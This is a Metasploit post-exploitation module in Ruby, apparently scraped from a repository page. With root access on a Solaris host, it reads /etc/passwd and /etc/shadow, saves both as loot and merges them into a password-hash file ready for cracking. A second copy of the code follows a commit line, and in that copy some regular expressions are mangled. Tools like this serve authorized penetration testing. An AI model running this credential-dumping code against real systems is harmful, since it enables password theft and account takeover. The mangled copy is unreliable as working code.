metasploit-framework/modules/post/solaris/gather/hashdump.rb

# $Id$
##

##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/solaris/priv'


class Metasploit3 < Msf::Post

	include Msf::Post::Common
	include Msf::Post::File
	include Msf::Post::Priv

	def initialize(info={})
		super( update_info( info,
				'Name'          => 'Solaris Gather Dump Password Hashes for Solaris Systems',
				'Description'   => %q{ Post Module to dump the password hashes for all users on a Solaris System},
				'License'       => MSF_LICENSE,
				'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
				'Version'       => '$Revision$',
				'Platform'      => [ 'solaris' ],
				'SessionTypes'  => [ 'shell' ]
			))
		register_options(
			[
				OptBool.new('VERBOSE', [false, 'Show list of Packages.', false]),
			], self.class)

	end

	# Run Method for when run command is issued
	def run
		if is_root?
			passwd_file = read_file("/etc/passwd")
			shadow_file = read_file("/etc/shadow")
			
			# Save in loot the passwd and shadow file
			store_loot("solaris.shadow", "text/plain", session, shadow_file, "shadow.tx", "Solaris Password Shadow File")
			store_loot("solaris.passwd", "text/plain", session, passwd_file, "passwd.tx", "Solaris Passwd File")

			# Unshadow the files
			john_file = unshadow(passwd_file, shadow_file)
			john_file.each_line do |l|
				print_good(l.chomp)
			end
			# Save pwd file
			upassf = store_loot("solaris.hashes", "text/plain", session, john_file, "unshadowed_passwd.pwd", "Solaris Unshadowed Password File")
			print_good("Unshadowed Password File: #{upassf}")
			
		else
			print_error("You must run this module as root!")
		end

	end

	def unshadow(pf,sf)
		unshadowed = ""
		sf.each_line do |sl|
			pass = sl.scan(/^\w*:([^:]*)/).join
			if pass !~ /^\*LK\*|^NP/
				user = sl.scan(/(^\w*):/).join
				pf.each_line do |pl|
					if pl.match(/^#{user}:/)
						unshadowed << pl.gsub(/:x:/,":#{pass}:")
					end
				end
			end
		end
		return unshadowed
	end
end
Initial set of Solaris post modules tested against Solaris 10 and 11 git-svn-id: file:///home/svn/framework3/trunk@12896 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-10 03:08:47 +00:00			`# $Id$`
			`##`

			`##`
			`# ## This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`

			`require 'msf/core'`
			`require 'rex'`
			`require 'msf/core/post/common'`
			`require 'msf/core/post/file'`
			`require 'msf/core/post/solaris/priv'`


			`class Metasploit3 < Msf::Post`

			`include Msf::Post::Common`
			`include Msf::Post::File`
			`include Msf::Post::Priv`

			`def initialize(info={})`
			`super( update_info( info,`
			`'Name' => 'Solaris Gather Dump Password Hashes for Solaris Systems',`
			`'Description' => %q{ Post Module to dump the password hashes for all users on a Solaris System},`
			`'License' => MSF_LICENSE,`
			`'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],`
			`'Version' => '$Revision$',`
			`'Platform' => [ 'solaris' ],`
			`'SessionTypes' => [ 'shell' ]`
			`))`
			`register_options(`
			`[`
			`OptBool.new('VERBOSE', [false, 'Show list of Packages.', false]),`
			`], self.class)`

			`end`

			`# Run Method for when run command is issued`
			`def run`
			`if is_root?`
			`passwd_file = read_file("/etc/passwd")`
			`shadow_file = read_file("/etc/shadow")`

			`# Save in loot the passwd and shadow file`
			`store_loot("solaris.shadow", "text/plain", session, shadow_file, "shadow.tx", "Solaris Password Shadow File")`
			`store_loot("solaris.passwd", "text/plain", session, passwd_file, "passwd.tx", "Solaris Passwd File")`

			`# Unshadow the files`
			`john_file = unshadow(passwd_file, shadow_file)`
			`john_file.each_line do \|l\|`
			`print_good(l.chomp)`
			`end`
			`# Save pwd file`
			`upassf = store_loot("solaris.hashes", "text/plain", session, john_file, "unshadowed_passwd.pwd", "Solaris Unshadowed Password File")`
			`print_good("Unshadowed Password File: #{upassf}")`

			`else`
			`print_error("You must run this module as root!")`
			`end`

			`end`

			`def unshadow(pf,sf)`
			`unshadowed = ""`
			`sf.each_line do \|sl\|`
			`pass = sl.scan(/^\w:([^:])/).join`
			`if pass !~ /^\LK\\|^NP/`
			`user = sl.scan(/(^\w*):/).join`
			`pf.each_line do \|pl\|`
			`if pl.match(/^#{user}:/)`
			`unshadowed << pl.gsub(/:x:/,":#{pass}:")`
			`end`
			`end`
			`end`
			`end`
			`return unshadowed`
			`end`
			`end`